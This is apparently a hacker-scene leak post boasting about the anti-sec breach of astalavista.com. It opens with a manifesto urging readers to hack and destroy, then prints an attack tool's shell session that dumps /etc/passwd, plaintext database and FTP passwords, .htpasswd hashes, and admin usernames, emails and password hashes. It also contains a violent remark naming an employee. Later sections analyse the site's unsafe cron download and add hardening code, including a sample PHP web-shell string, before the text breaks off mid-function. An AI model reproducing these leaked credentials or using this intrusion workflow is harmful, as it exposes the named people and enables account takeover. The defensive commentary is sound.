I DON'T WANT TO BE FAMOUS, I DON'T WANT TO BE IN ANY EZINE, I JUST WANT TO SHARE KNOWLEDGE

~ Fuck full-disclosure
~ Fuck the security industry
~ Keep 0days private
~ Hack everyone you can and then hack some more
~ Blend in.
~ Get trusted.
~ Trust no one.
~ Own everyone.
~ Disclose nothing.
~ Destroy everything.
~ Take back the scene
~ Never sell out, never surrender.
~ Get in as anonymous, Leave with no trace.
~ FUCK OFF I've got enough friends !!!!



ASTALAVISTA HAMMERED INTO THE GROUND

This security and hacking site, online since 2001, is a familiar name to IT professionals and to the hacker [script kiddie] crowd alike.
From site-audit contests to open discussion of security systems, all of it ran through the ASTALAVISTA FORUM. And now the site itself, at http://astalavista.com, has just been broken into by a crew of professional hackers going by the name anti-sec group.
Wow... scary stuff. This is the same crew that took down http://milw0rm.com and Hackforums.net, and on 10 July 2009 also hit the image-hosting service http://imageshack.us.
heuheuheuheu :P
During the attack the intruder was able to reach every part of the system.
From that shell (the log below shows it running as uid=100(apache), the web server account, not root) the attacker went through everything on the site: CMS source, config files holding database and FTP credentials, .htpasswd files, cron jobs and the user table.

Let's look at the method this mighty attacker used:
============================================================
anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner...
LiteSpeed
[+] Injecting shellcode...
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx--x--x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam

sh-3.2$ head -20 index.php

/**
* The main page for the CMS
* @copyright CONTREXX CMS - COMVATION AG
* @author Comvation Development Team
* @version v1.0.9.10.1 stable
* @package contrexx
* @subpackage core
* @link http://www.contrexx.com/ contrexx homepage
* @since v0.0.0.0
* @todo Capitalize all class names in project
* @uses /config/configuration.php
* @uses /config/settings.php
* @uses /config/version.php
* @uses /core/API.php
* @uses /core_modules/cache/index.class.php
* @uses /core/error.class.php
* @uses /core_modules/banner/index.class.php
* @uses /core_modules/contact/index.class.php

sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php

sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
$_DBCONFIG['user'] = 'contrexxuser2'; // Database username
$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
$_FTPCONFIG['path'] = '/'; // Ftp path to cms

sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess

sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user

sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg

sh-3.2$ cat test.php
$url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9
pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
$url = str_replace(array('&', '&'), '&', base64_decode(rawurldecode($url)));
echo $url;
?>

sh-3.2$ cd modifications/
sh-3.2$ ls -la
total 32
drwxr-xr-x 8 com com 4096 May 11 12:48 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp

sh-3.2$ ls -R
.:
com_avtng cronjobs onlinetools pjirc search _tmp

./com_avtng:
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts

./com_avtng/scripts:
popunder.js

./cronjobs:
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp

./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv

./onlinetools:
index.php

./pjirc:
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd

./pjirc/img:
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
verre-eau.gif
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
verre-vin.gif
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif

./pjirc/snd:
bell2.au ding.au

./search:
searchEngines.php search.php

./_tmp:
defaultPorts.php defaultPorts.txt

sh-3.2$ cd cronjobs/
sh-3.2$ cat exploits.php
[snip]
$categories = array();
$milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
$expolits = file($milw0rmFile);
$comExploits = array();
[snip]
// manage data
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640

// get path and title
$expolits[$x] = trim($expolits[$x]);
$path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);

// check if file exists
if (file_exists($path)) {

$text = file_get_contents($path);

// get content and date
//$text = htmlspecialchars($text, ENT_QUOTES);
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
if ($tmptext != '') {
$text = $tmptext;
} else {
$text = addslashes(htmlentities($text, ENT_QUOTES));
}
$date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
$tmp = explode('-', $date);
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
$cat = getCategory ($path);
$ext = pathinfo(basename($path));
$ext = $ext['extension'];
$qStr = "
SELECT `id`
FROM `contrexx_module_exploits`
WHERE `title` = '" . $title . "'
AND `date` = '" . $date . "'
";
echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
$q = $_objDB->query($qStr);

if ($q->numRows() == 0) {

// prepare array
$comExploits[$x]['date'] = $date;
$comExploits[$x]['title'] = $title;
$comExploits[$x]['author'] = 'milw0rm';
$comExploits[$x]['text'] = $text;
$comExploits[$x]['source'] = $ext;
$comExploits[$x]['url1'] = '';
$comExploits[$x]['url2'] = '';
$comExploits[$x]['catid'] = $cat;
$comExploits[$x]['lang'] = '2';
$comExploits[$x]['userid'] = '12';
$comExploits[$x]['startdate'] = '0000-00-00';
$comExploits[$x]['enddate'] = '0000-00-00';
$comExploits[$x]['status'] = '1';
$comExploits[$x]['changelog'] = $date;

}
[snip]
$xml = '


ASTALAVISTA.com - Exploits
http://www.astalavista.com/exploits
All availably Exploits.
en-us
' . date('F, j M Y H:i:s O') . '
http://blogs.law.harvard.edu/tech/rss
Astalavista.com
info@astalavista.com' . $items . '


';


if (file_exists(FULLPATH . '/feed/exploits.xml')) {
unlink (FULLPATH . '/feed/exploits.xml');
}


file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
[snip]

sh-3.2$ cat exploits.sh
#!/bin/sh
###########################################################
# #
# Title: milw0rm exploits adder #
# Description: Add all milw0rm exploits to the #
# Astalavista.com database #
# #
# Company: Astalavista Group #
# Author: Paulo M. Santos #
# E-Mail: paulo.santos@astalavista.ch #
# #
###########################################################


# path
this_path=/home/com/public_html/modifications/cronjobs

# change directory
cd $this_path
cd tmp/

# delete files
rm -rf milw0rm.tar.* &
rm -rf milw0rm/ &

# wget milw0rm paket
wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2

# extract milw0rm paket
tar -xvf milw0rm.tar.bz2

# change owner
chown -R com .
chgrp -R com .

# execute php script
cd $this_path
php -q exploits.php

# delete files
rm -rf tmp/milw0rm.tar.*
rm -rf tmp/milw0rm/

sh-3.2$ echo "Paulo M. Santos needs to be shot down."
Paulo M. Santos needs to be shot down.

mysql -u contrexxuser2 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 261694
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| com_contrexx2 |
| com_contrexx2_live |
| test |
+--------------------+
4 rows in set (0.00 sec)

mysql> use com_contrexx2_live
Database changed
mysql> show tables;
+--------------------------------------------------+
| Tables_in_com_contrexx2_live |
+--------------------------------------------------+
| cc_banner_counter |
| cc_search_counter |
| contrexx_access_group_dynamic_ids |
| contrexx_access_group_static_ids |
| contrexx_access_rel_user_group |
| contrexx_access_settings |
| contrexx_access_user_attribute |
| contrexx_access_user_attribute_name |
| contrexx_access_user_attribute_value |
| contrexx_access_user_core_attribute |
| contrexx_access_user_groups |
| contrexx_access_user_mail |
| contrexx_access_user_profile |
| contrexx_access_user_title |
| contrexx_access_user_validity |
| contrexx_access_users |
| contrexx_backend_areas |
| contrexx_backups |
| contrexx_content |
| contrexx_content_history |
| contrexx_content_logfile |
| contrexx_content_navigation |
| contrexx_content_navigation_history |
| contrexx_ids |
| contrexx_languages |
| contrexx_lib_country |
| contrexx_log |
| contrexx_module_alias_source |
| contrexx_module_alias_target |
| contrexx_module_block_blocks |
| contrexx_module_block_rel_lang |
| contrexx_module_block_rel_pages |
| contrexx_module_block_settings |
| contrexx_module_blog_categories |
| contrexx_module_blog_comments |
| contrexx_module_blog_message_to_category |
| contrexx_module_blog_messages |
| contrexx_module_blog_messages_lang |
| contrexx_module_blog_networks |
| contrexx_module_blog_networks_lang |
| contrexx_module_blog_settings |
| contrexx_module_blog_votes |
| contrexx_module_calendar |
| contrexx_module_calendar_access |
| contrexx_module_calendar_categories |
| contrexx_module_calendar_form_data |
| contrexx_module_calendar_form_fields |
| contrexx_module_calendar_registrations |
| contrexx_module_calendar_settings |
| contrexx_module_calendar_style |
| contrexx_module_contact_form |
| contrexx_module_contact_form_data |
| contrexx_module_contact_form_field |
| contrexx_module_contact_settings |
| contrexx_module_data_categories |
| contrexx_module_data_message_to_category |
| contrexx_module_data_messages |
| contrexx_module_data_messages_lang |
| contrexx_module_data_placeholders |
| contrexx_module_data_settings |
| contrexx_module_directory_access |
| contrexx_module_directory_categories |
| contrexx_module_directory_dir |
| contrexx_module_directory_inputfields |
| contrexx_module_directory_levels |
| contrexx_module_directory_mail |
| contrexx_module_directory_rel_dir_cat |
| contrexx_module_directory_rel_dir_level |
| contrexx_module_directory_settings |
| contrexx_module_directory_settings_google |
| contrexx_module_directory_vote |
| contrexx_module_docsys |
| contrexx_module_docsys_categories |
| contrexx_module_egov_configuration |
| contrexx_module_egov_orders |
| contrexx_module_egov_product_calendar |
| contrexx_module_egov_product_fields |
| contrexx_module_egov_products |
| contrexx_module_egov_settings |
| contrexx_module_exploits |
| contrexx_module_exploits_categories |
| contrexx_module_feed_category |
| contrexx_module_feed_news |
| contrexx_module_feed_newsml_association |
| contrexx_module_feed_newsml_categories |
| contrexx_module_feed_newsml_documents |
| contrexx_module_feed_newsml_providers |
| contrexx_module_forum_access |
| contrexx_module_forum_categories |
| contrexx_module_forum_categories_lang |
| contrexx_module_forum_notification |
| contrexx_module_forum_postings |
| contrexx_module_forum_rating |
| contrexx_module_forum_settings |
| contrexx_module_forum_statistics |
| contrexx_module_gallery_categories |
| contrexx_module_gallery_comments |
| contrexx_module_gallery_language |
| contrexx_module_gallery_language_pics |
| contrexx_module_gallery_pictures |
| contrexx_module_gallery_settings |
| contrexx_module_gallery_votes |
| contrexx_module_guestbook |
| contrexx_module_guestbook_settings |
| contrexx_module_livecam |
| contrexx_module_livecam_settings |
| contrexx_module_market |
| contrexx_module_market_access |
| contrexx_module_market_categories |
| contrexx_module_market_mail |
| contrexx_module_market_paypal |
| contrexx_module_market_settings |
| contrexx_module_market_spez_fields |
| contrexx_module_mediadir_access |
| contrexx_module_mediadir_categories |
| contrexx_module_mediadir_comments |
| contrexx_module_mediadir_dir |
| contrexx_module_mediadir_inputfields |
| contrexx_module_mediadir_levels |
| contrexx_module_mediadir_mail |
| contrexx_module_mediadir_rel_dir_cat |
| contrexx_module_mediadir_rel_dir_level |
| contrexx_module_mediadir_reports |
| contrexx_module_mediadir_settings |
| contrexx_module_mediadir_settings_google |
| contrexx_module_mediadir_vote |
| contrexx_module_memberdir_directories |
| contrexx_module_memberdir_name |
| contrexx_module_memberdir_settings |
| contrexx_module_memberdir_values |
| contrexx_module_nettools_allowed_groups |
| contrexx_module_nettools_settings |
| contrexx_module_news |
| contrexx_module_news_access |
| contrexx_module_news_categories |
| contrexx_module_news_settings |
| contrexx_module_news_teaser_frame |
| contrexx_module_news_teaser_frame_templates |
| contrexx_module_news_ticker |
| contrexx_module_newsletter |
| contrexx_module_newsletter_attachment |
| contrexx_module_newsletter_category |
| contrexx_module_newsletter_confirm_mail |
| contrexx_module_newsletter_rel_cat_news |
| contrexx_module_newsletter_rel_user_cat |
| contrexx_module_newsletter_settings |
| contrexx_module_newsletter_template |
| contrexx_module_newsletter_tmp_sending |
| contrexx_module_newsletter_user |
| contrexx_module_newsletter_user_title |
| contrexx_module_onlinetools_defaultports |
| contrexx_module_onlinetools_defaultports_back |
| contrexx_module_onlinetools_geolitecity_blocks |
| contrexx_module_onlinetools_geolitecity_country |
| contrexx_module_onlinetools_geolitecity_location |
| contrexx_module_podcast_category |
| contrexx_module_podcast_medium |
| contrexx_module_podcast_rel_category_lang |
| contrexx_module_podcast_rel_medium_category |
| contrexx_module_podcast_settings |
| contrexx_module_podcast_template |
| contrexx_module_proxydb |
| contrexx_module_recommend |
| contrexx_module_repository |
| contrexx_module_securitynews_cats |
| contrexx_module_securitynews_feeds |
| contrexx_module_securitynews_news |
| contrexx_module_shop_categories |
| contrexx_module_shop_config |
| contrexx_module_shop_countries |
| contrexx_module_shop_currencies |
| contrexx_module_shop_customers |
| contrexx_module_shop_importimg |
| contrexx_module_shop_lsv |
| contrexx_module_shop_mail |
| contrexx_module_shop_mail_content |
| contrexx_module_shop_manufacturer |
| contrexx_module_shop_order_items |
| contrexx_module_shop_order_items_attributes |
| contrexx_module_shop_orders |
| contrexx_module_shop_payment |
| contrexx_module_shop_payment_processors |
| contrexx_module_shop_pricelists |
| contrexx_module_shop_products |
| contrexx_module_shop_products_attributes |
| contrexx_module_shop_products_attributes_name |
| contrexx_module_shop_products_attributes_value |
| contrexx_module_shop_products_downloads |
| contrexx_module_shop_rel_countries |
| contrexx_module_shop_rel_payment |
| contrexx_module_shop_rel_shipment |
| contrexx_module_shop_shipment_cost |
| contrexx_module_shop_shipper |
| contrexx_module_shop_vat |
| contrexx_module_shop_zones |
| contrexx_module_u2u_address_list |
| contrexx_module_u2u_message_log |
| contrexx_module_u2u_sent_messages |
| contrexx_module_u2u_settings |
| contrexx_module_u2u_user_log |
| contrexx_modules |
| contrexx_sessions |
| contrexx_settings |
| contrexx_settings_smtp |
| contrexx_skins |
| contrexx_stats_browser |
| contrexx_stats_colourdepth |
| contrexx_stats_config |
| contrexx_stats_country |
| contrexx_stats_hostname |
| contrexx_stats_javascript |
| contrexx_stats_operatingsystem |
| contrexx_stats_referer |
| contrexx_stats_requests |
| contrexx_stats_requests_summary |
| contrexx_stats_screenresolution |
| contrexx_stats_search |
| contrexx_stats_spiders |
| contrexx_stats_spiders_summary |
| contrexx_stats_visitors |
| contrexx_stats_visitors_summary |
| contrexx_voting_additionaldata |
| contrexx_voting_email |
| contrexx_voting_rel_email_system |
| contrexx_voting_results |
| contrexx_voting_system |
| foo |
+--------------------------------------------------+
227 rows in set (0.01 sec)

mysql> select count(*) as skids from contrexx_access_users;
+-------+
| skids |
+-------+
| 53699 |
+-------+
1 row in set (0.00 sec)

mysql> describe contrexx_access_users;
+------------------+------------------------------------------+------+-----+--------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------+------------------------------------------+------+-----+--------------+----------------+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| is_admin | tinyint(1) unsigned | NO | | 0 | |
| username | varchar(40) | YES | MUL | NULL | |
| password | varchar(32) | YES | | NULL | |
| regdate | int(14) unsigned | NO | | 0 | |
| expiration | int(14) unsigned | NO | | 0 | |
| validity | int(10) unsigned | NO | | 0 | |
| last_auth | int(14) unsigned | NO | | 0 | |
| last_activity | int(14) unsigned | NO | | 0 | |
| email | varchar(255) | YES | | NULL | |
| email_access | enum('everyone','members_only','nobody') | NO | | nobody | |
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
| backend_lang_id | int(2) unsigned | NO | | 0 | |
| active | tinyint(1) | NO | | 0 | |
| profile_access | enum('everyone','members_only','nobody') | NO | | members_only | |
| restore_key | varchar(32) | NO | | | |
| restore_key_time | int(14) unsigned | NO | | 0 | |
| u2u_active | enum('0','1') | NO | | 1 | |
+------------------+------------------------------------------+------+-----+--------------+----------------+
18 rows in set (0.00 sec)

mysql> select username,password,email from contrexx_access_users where is_admin = 1;
+------------+----------------------------------+-----------------------------+
| username | password | email |
+------------+----------------------------------+-----------------------------+
| system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
| schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
+------------+----------------------------------+-----------------------------+
4 rows in set (0.04 sec)

mysql> exit;
Bye
================================================================
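The exploits.sh cron job in the log above fetches milw0rm.tar.bz2 over plain HTTP, unpacks it with `tar -xvf` into the web root as user com, and only then runs exploits.php over the result; the `rm -rf` lines before it are backgrounded with `&`, so they can still be running when wget and tar start. Anyone who can tamper with that download gets to drop files into /home/com/public_html. Below is an added example, not code from the page, from Astalavista or from anti-sec, of how that fetch-and-extract step can be hardened in Python: pin the archive's SHA-256 and vet every member before anything is written. The pinned digest, the archive contents and the member names are constructed for the demo.

```python
"""Added example: pinned-hash verification plus member vetting before
extracting an untrusted tarball (replacement for the wget + tar -xvf step).
Nothing here is Astalavista's or anti-sec's code; all sample data is made up.
"""
import hashlib
import hmac
import io
import os
import posixpath
import tarfile
import tempfile


class UnsafeArchive(Exception):
    """Raised when the archive fails the pinned-hash or member checks."""


def verify_digest(data: bytes, expected_sha256: str) -> bool:
    """Compare the archive's SHA-256 with a pinned value in constant time."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


def check_members(tar: tarfile.TarFile, dest: str) -> list:
    """Vet every member before anything is written: reject absolute paths,
    '..' components, anything resolving outside dest, links and special files."""
    real_dest = os.path.realpath(dest)
    names = []
    for m in tar.getmembers():
        if posixpath.isabs(m.name) or ".." in m.name.split("/"):
            raise UnsafeArchive(f"path escapes destination: {m.name}")
        target = os.path.realpath(os.path.join(real_dest, m.name))
        if os.path.commonpath([real_dest, target]) != real_dest:
            raise UnsafeArchive(f"path escapes destination: {m.name}")
        if m.issym() or m.islnk():
            raise UnsafeArchive(f"link member refused: {m.name}")
        if not (m.isfile() or m.isdir()):
            raise UnsafeArchive(f"special file refused: {m.name}")
        names.append(m.name)
    return names


def safe_extract(data: bytes, expected_sha256: str, dest: str) -> list:
    """Verify the pinned digest, vet the members, then extract. Returns the
    extracted member names."""
    if not verify_digest(data, expected_sha256):
        raise UnsafeArchive("archive digest does not match pinned value")
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        names = check_members(tar, dest)
        if hasattr(tarfile, "data_filter"):      # Python 3.12+: belt and braces
            tar.extractall(dest, filter="data")
        else:
            tar.extractall(dest)                 # every member vetted above
    return names


def build_archive(members: dict) -> bytes:
    """Constructed sample: build an in-memory .tar.bz2 from {name: bytes}.
    tarfile happily writes a hostile '../' name, just as an attacker would."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:bz2") as tar:
        for name, content in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def demo() -> dict:
    """Good archive, path-traversal archive and a tampered download; returns
    what happened in each case."""
    good = build_archive({"milw0rm/sploitlist.txt": b"./exploits/1.c Demo title\n"})
    hostile = build_archive({"../public_html/shell.php": b"<?php system($_GET['c']); ?>"})
    results = {}
    with tempfile.TemporaryDirectory() as dest:
        pinned = hashlib.sha256(good).hexdigest()    # the value an operator would pin
        results["good"] = safe_extract(good, pinned, dest)
        results["good_on_disk"] = os.path.isfile(os.path.join(dest, "milw0rm", "sploitlist.txt"))
        cases = (("hostile", hostile, hashlib.sha256(hostile).hexdigest()),
                 ("tampered", good, "00" * 32))
        for label, blob, digest in cases:
            try:
                safe_extract(blob, digest, dest)
                results[label] = "extracted"
            except UnsafeArchive as e:
                results[label] = str(e)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, "->", outcome)
```

Pinning a digest only works if the upstream publishes one (or the operator re-pins on every deliberate refresh); without that, at least move the download to HTTPS and extract into a scratch directory outside the web root, then move vetted files into place.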

Wow... and there go the admin password hashes. Not that the attacker needs them: with a shell on the box (running as apache, the web server account, as the id output above shows) every config file and database was already readable. Note that system and schmid carry the identical hash 0defe9e458e745625fffbc215d7801c5 in a varchar(32) column with no salt field: the CMS stores a bare 32-character hash, so equal passwords give equal hashes and one cracked hash unlocks both accounts.
heuheuheuheu :P NEXT...
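The admin dump above is what an unsalted 32-hex password column looks like from the outside: two accounts sharing one hash. Here is an added example, not code from the page or from the Contrexx CMS, of how a practitioner audits such a dump and what the storage should look like instead. The rows are constructed to mirror the shape of the leaked table (username, 32-hex password, email); the names and hash values are made up, not the ones on the page.

```python
"""Added example: auditing a dumped user table for unsalted hashes, and the
salted slow-KDF storage that should replace it. Sample rows are constructed.
"""
import hashlib
import hmac
import os
import re
from collections import defaultdict

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def looks_unsalted(rows) -> bool:
    """True when every password field is a bare 32-hex digest. With no salt
    column and no $id$ prefix there is nowhere for a salt to live."""
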